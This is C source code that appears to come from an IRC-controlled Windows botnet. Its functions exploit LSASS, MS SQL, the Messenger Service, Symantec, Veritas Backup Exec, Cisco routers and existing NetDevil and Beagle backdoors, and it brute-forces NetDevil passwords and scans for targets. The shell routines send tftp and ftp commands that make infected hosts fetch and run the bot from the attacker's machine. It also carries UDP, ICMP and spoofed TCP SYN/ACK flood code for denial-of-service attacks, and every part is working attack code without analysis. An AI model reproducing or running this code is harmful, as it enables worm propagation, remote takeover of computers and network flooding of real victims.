BOOL Symantec(EXINFO exinfo) { SOCKET sock; struct sockaddr_in server; server.sin_family = AF_INET; server.sin_addr.s_addr = finet_addr(exinfo.ip); server.sin_port = fhtons((unsigned short)exinfo.port); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { return FALSE; } if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR) { closesocket(sock); return FALSE; } if (send(sock, ShellCode, sizeof(ShellCode), 0) == SOCKET_ERROR) { closesocket(sock); return FALSE; } closesocket(sock); if (BuZShell(exinfo,8555)) { exploit[exinfo.exploit].stats++; return true; } return TRUE; }
SOCKET CreateSock(char *host, unsigned short port) { SOCKET ssock; if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) return INVALID_SOCKET; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(port); IN_ADDR in; in.s_addr = finet_addr(host); LPHOSTENT Hostent = NULL; if (in.s_addr == INADDR_NONE) Hostent = fgethostbyname(host); //hostname if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns return INVALID_SOCKET; ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in)); if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); return INVALID_SOCKET; } return (ssock); }
BOOL thcsql(char *target, void* conn,EXINFO exinfo) { IRC* irc=(IRC*)conn; unsigned int sock,rc; struct sockaddr_in sqludp; if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) return FALSE; sqludp.sin_family=AF_INET; sqludp.sin_addr.s_addr=finet_addr(exinfo.ip); sqludp.sin_port=fhtons(exinfo.port); if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR) { if(rc==0) { fsend(sock,badbuffer,sizeof(badbuffer)-1,0); Sleep(1000); if (ConnectShell(exinfo, 31337)) { exploit[exinfo.exploit].stats++; if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } } fshutdown(sock,1); fclosesocket(sock); return FALSE; }
BOOL CiscoHTTP(EXINFO exinfo) { int ret,SocketFD; char buffer[4096]; if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)exinfo.port); if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { if(fsend(SocketFD, HTTP_REQUEST, strlen(HTTP_REQUEST), 0) < 0) return FALSE; memset(buffer, 0, sizeof(buffer)); if((ret = frecv(SocketFD, buffer, sizeof(buffer), 0)) < 0) return FALSE; fclosesocket(SocketFD); if(ret < 5) return FALSE; if(strstr(buffer, "HTTP/1.0 200 OK") == NULL || strstr(buffer, "cisco") == NULL) return FALSE; char sendbuf[IRCLINE]; _snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(http)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
bool ConnectShell(EXINFO exinfo) { int len; struct sockaddr_in shell_addr; char recvbuf[1024]; SOCKET sockfd; shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); shell_addr.sin_port = fhtons((unsigned short)exinfo.port);; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == -1 ) return false; if (fconnect(sockfd, (struct sockaddr *)&shell_addr, sizeof(struct sockaddr)) == -1) return false; char mkdir_buff[400]=""; len = frecv(sockfd, recvbuf, 1024, 0); _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s\n" "%s\n", GetIP(exinfo.sock),filename, filename); if (fsend(sockfd, mkdir_buff, sizeof(mkdir_buff)-1,0) == -1) return false; return true; }
BOOL Cisco(EXINFO exinfo) { int ret,SocketFD; char buffer1[64],buffer2[64]; if((SocketFD = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE;; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons((unsigned short)exinfo.port); if(fconnect(SocketFD, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { memset(buffer1, '\0', 64); memset(buffer2, '\0', 64); if ((ret = frecv(SocketFD, buffer1, 64, 0)) > 0) { ret = frecv(SocketFD, buffer1, 64, 0); fsend(SocketFD,"cisco\r",6,0); ret = frecv(SocketFD, buffer2, 64, 0); if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40))) { char sendbuf[IRCLINE]; _snprintf(sendbuf, sizeof(sendbuf), "-\x03\x34\2cisco(telnet)\x03\2- found router: %s", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; return TRUE; } } } return FALSE; }
// function for sending udp packets DWORD WINAPI udp(LPVOID param) { PINGFLOOD udp = *((PINGFLOOD *)param); PINGFLOOD *udps = (PINGFLOOD *)param; udps->gotinfo = TRUE; char sendbuf[IRCLINE], pbuff[MAXPINGSIZE]; int i; srand(GetTickCount()); SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; IN_ADDR iaddr; iaddr.s_addr = finet_addr(udp.host); LPHOSTENT hostent = NULL; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(udp.host); if (hostent == NULL && iaddr.s_addr == INADDR_NONE) { sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(1); } ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr)); ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port))); if (udp.port < 1) udp.port = 1; if (udp.port > MAXUDPPORT) udp.port = MAXUDPPORT; udp.num = udp.num / 10; if (udp.delay == 0) udp.delay = 1; for (i = 0; i < udp.size; i++) pbuff[i] = (char)(rand() % 255); while (udp.num-- > 0) { //change port every 10 packets (if one isn't specified) for (i = 0; i < 11; i++) { fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin)); Sleep(udp.delay); } if (udp.port == 0) ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1)); } sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host); if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice); addlog(sendbuf); clearthread(udp.threadnum); ExitThread(0); }
BOOL lsass(EXINFO exinfo) { int len; SOCKET sockfd; int dport = 44444; struct sockaddr_in their_addr; char recvbuf[1600]; { their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); /* ^ Server's address */ their_addr.sin_port = fhtons((unsigned short)exinfo.port); /* connect to the server */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; if (fconnect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR) return FALSE; if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); switch (recvbuf[68]) { case '1': // win XP if (!Exploit2( exinfo, sockfd, 0 )) return FALSE; break; case '0': //win 2k if (!Exploit2( exinfo, sockfd, 2 )) if (!Exploit2( exinfo, sockfd, 1)) return FALSE; break; default: return FALSE; } } return TRUE; }
BOOL MessengerService(EXINFO exinfo) { int sockUDP,ver,packetsz; unsigned char packet[8192]; struct sockaddr_in targetUDP; struct { char os[30]; DWORD SEH; DWORD JMP; } targetOS[] = { { "Windows 2000 SP 3 (en)", 0x77ee044c, // unhandledexceptionfilter pointer 0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e }, { "Windows XP SP 1 (en)", 0x77ed73b4, 0x7804bf52 //rpcrt4.dll call [edi+6c] } }; int TargetOS = FpHost(exinfo.ip, FP_RPC); if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE; if (TargetOS == OS_WIN2K) ver = 0; if (TargetOS == OS_WINXP) ver = 1; ZeroMemory(&targetUDP, sizeof(targetUDP)); targetUDP.sin_family = AF_INET; targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip); targetUDP.sin_port = fhtons(exinfo.port); packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH); if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { return FALSE; } if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) { return FALSE; } fclosesocket(sockUDP); Sleep(500); if (ConnectShellEx(exinfo, 9191) == true) { exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
BOOL NetDevil(EXINFO exinfo) { char buffer[IRCLINE]; DWORD mode=0; SOCKET ssock; if ((ssock = fsocket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) return FALSE; SOCKADDR_IN sin; sin.sin_family = AF_INET; sin.sin_addr.s_addr = finet_addr(exinfo.ip); sin.sin_port = fhtons(exinfo.port); fconnect(ssock,(LPSOCKADDR)&sin,sizeof(sin)); fioctlsocket(ssock,FIONBIO,&mode); for (int i=0; passwords[i]; i++) { Sleep(50); memset(buffer,0,sizeof(buffer)); if (NetDevil_Receive(ssock) == -1) break; if (frecv(ssock, buffer, sizeof(buffer), 0) <= 0) break; if (strcmp(buffer,"passed") == 0) { sprintf(buffer,"nd %s %s",exinfo.ip ,passwords[i-1]); fsend(ssock, buffer, strlen(buffer), 0); if (NetDevil_Upload(exinfo.ip,ssock) == 1) { fclosesocket(ssock); _snprintf(buffer,sizeof(buffer),"[%s]: Exploiting IP: %s, Password: (%s)",exploit[exinfo.exploit].name,exinfo.ip,((strcmp(passwords[i-i],"")==0)?("(no password)"):(passwords[i-1]))); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; } break; } if (strcmp(buffer,"pass_pleaz") == 0) { memset(buffer,0,sizeof(buffer)); sprintf(buffer,"pass_pleaz%s",passwords[i]); fsend(ssock,buffer ,strlen(buffer), 0); continue; } else break; } fclosesocket(ssock); return FALSE; }
BOOL SkonkShell( EXINFO exinfo, unsigned int bindport ) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); shell_addr.sin_port = fhtons(bindport); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// #ifndef NO_TFTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s &%s\r\n", GetIP( exinfo.sock ),filename, filename); #endif ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////// if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
// function for sending pings DWORD WINAPI ping(LPVOID param) { char sendbuf[IRCLINE], pbuff[MAXPINGSIZE]; unsigned long ip; PINGFLOOD ping = *((PINGFLOOD *)param); PINGFLOOD *pings = (PINGFLOOD *)param; pings->gotinfo = TRUE; HANDLE icmp = (HANDLE)fIcmpCreateFile(); IN_ADDR iaddr; iaddr.s_addr = finet_addr(ping.host); LPHOSTENT hostent = NULL; if (iaddr.s_addr == INADDR_NONE) hostent = fgethostbyname(ping.host); if ((hostent == NULL && iaddr.s_addr == INADDR_NONE) || icmp == INVALID_HANDLE_VALUE) { sprintf(sendbuf,"[PING]: Error sending pings to %s.", ping.host); if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice); addlog(sendbuf); clearthread(ping.threadnum); ExitThread(1); } if (hostent != NULL) ip = *(DWORD*)*hostent->h_addr_list; else ip = iaddr.s_addr; ICMP_ECHO_REPLY reply; memset(&reply, 0, sizeof(reply)); reply.RoundTripTime = 0xffffffff; if (ping.size > MAXPINGSIZE) ping.size = MAXPINGSIZE; if (ping.delay < 1) ping.delay = 1; for (int i = 0; i < ping.num; i++) fIcmpSendEcho(icmp, ip, pbuff, ping.size, NULL, &reply, sizeof(ICMP_ECHO_REPLY), ping.delay); fIcmpCloseHandle(icmp); sprintf(sendbuf,"[PING]: Finished sending pings to %s.", ping.host); if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice); addlog(sendbuf); clearthread(ping.threadnum); ExitThread(0); }
int check_os(char *host,unsigned short target_port, int *sp) { SOCKET sSock; if ((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(host); ssin.sin_port = fhtons((unsigned short)target_port); if (fconnect(sSock,(LPSOCKADDR)&ssin,sizeof(ssin)) != SOCKET_ERROR) { char recv_buff[5000]; memset(recv_buff,0,sizeof(recv_buff)); TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(sSock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) > 0) { if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { if (fsend(sSock,(const char *)send_buff,strlen((const char*)send_buff),0) > 0) { if (frecv(sSock,recv_buff,sizeof(recv_buff),0) > 0) { fclosesocket(sSock); *sp=atoi(&recv_buff[37]); if (recv_buff[8] == 5 && recv_buff[12] == 0) return ID_WIN2K; else if (recv_buff[8] == 5 && recv_buff[12] == 1) return ID_WINXP; else if (recv_buff[8] == 5 && recv_buff[12] == 2) return ID_WIN2K3; else if (recv_buff[8] == 4) return ID_WINNT; else return ID_UNKNOWN; } } } } } fclosesocket(sSock); } return 1; }
bool ConnectShell2(EXINFO exinfo) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); shell_addr.sin_port = fhtons(xport);; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); #ifndef NO_TFTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename); #endif #ifndef NO_FTPD _snprintf(mkdir_buff, sizeof (mkdir_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s\r\n", GetIP(exinfo.sock),FTP_PORT, filename, filename); #endif if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
BOOL Beagle(EXINFO exinfo) { char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT]; BOOL success = FALSE; WSADATA WSAData; if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0) return FALSE; SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2)); if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) { if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) { GetModuleFileName(0, botfile, sizeof(botfile)); _splitpath(botfile, NULL, NULL, fname, ext); _snprintf(botfile, sizeof(botfile), "%s%s", fname, ext); _snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile); if(fsend(sSock, buffer, sizeof(buffer), 0)) success = TRUE; } } } } fclosesocket(sSock); fWSACleanup(); if (success) { _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; } return (success); }
// FIX ME: This could probably be (re)moved, its just from the original exploit layout. int WksSocket(int tm, int port, const char *WksIP) { unsigned int sock; unsigned long y = 1; struct timeval timeout; struct sockaddr_in target_ip; if ((sock = fsocket(AF_INET, SOCK_STREAM, 0)) == -1) return -1; target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = finet_addr(WksIP); target_ip.sin_port = fhtons(port); fioctlsocket(sock,FIONBIO,&y); timeout.tv_sec=tm; timeout.tv_usec = 0; if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1) { fd_set writefds; fd_set exceptfds; FD_ZERO (&writefds); FD_ZERO (&exceptfds); FD_SET (sock, &writefds); FD_SET (sock, &exceptfds); fselect(0, NULL, &writefds, &exceptfds, &timeout); //if (!FDI_ISSET (sock, &writefds)) if (!__fWSAFDIsSet(sock, &writefds)) { fclosesocket(sock); return -1; } y=0; fioctlsocket(sock,FIONBIO,&y); } return sock; }
bool ConnectShell2(EXINFO exinfo) { int len; char recvbuf[1024]; SOCKET sockfd; SOCKADDR_IN shell_addr; memset(&shell_addr, 0, sizeof(shell_addr)); shell_addr.sin_family = AF_INET; shell_addr.sin_addr.s_addr = finet_addr(exinfo.ip); shell_addr.sin_port = fhtons(7777); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET ) return false; if (fconnect(sockfd, (LPSOCKADDR)&shell_addr, sizeof(shell_addr)) == SOCKET_ERROR) return false; char mkdir_buff[400]; len = frecv(sockfd, recvbuf, 1024, 0); _snprintf(mkdir_buff, sizeof (mkdir_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; Sleep(500); _snprintf(mkdir_buff, sizeof (mkdir_buff), "%s\r\n", filename); if (fsend(sockfd, mkdir_buff, strlen(mkdir_buff),0) == -1) return false; len = frecv(sockfd, recvbuf, 1024, 0); fclosesocket(sockfd); return true; }
bool veritasbackupserver(EXINFO exinfo) { SOCKET sock; if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false; SOCKADDR_IN sin; memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = fhtons((unsigned short)exinfo.port); sin.sin_addr.s_addr = finet_addr(exinfo.ip); char payload[800]; char v91sp0sp1[]="\xFF\x50\x11\x40"; char esisp0sp1[]="\xA1\xFF\x42\x01"; memcpy(&talk[37], &v91sp0sp1, 4); memcpy(&talk[72], &esisp0sp1, 4); //os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0"; strcpy(payload,veritassc); if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false; if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false; Sleep(10); for (int i=0; i < 7;i++) { if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false; Sleep(10); } Sleep(1000); fclosesocket(sock); ConnectShell(exinfo,101); return (AddEx(exinfo,true)); }
DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; //char szSelfExe[MAX_PATH]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); /* // FIX ME: Make this a standalone function if (!FileExists(szLocalPayloadFile)) { GetModuleFileName(0,szSelfExe,MAX_PATH); CopyFile(szSelfExe,szLocalPayloadFile,FALSE); // FIX ME: Make this copy to the same directory (could affect other stuff) } */ CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { // failed to initialize CriticalSection sprintf(buffer,"[SCAN]: Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
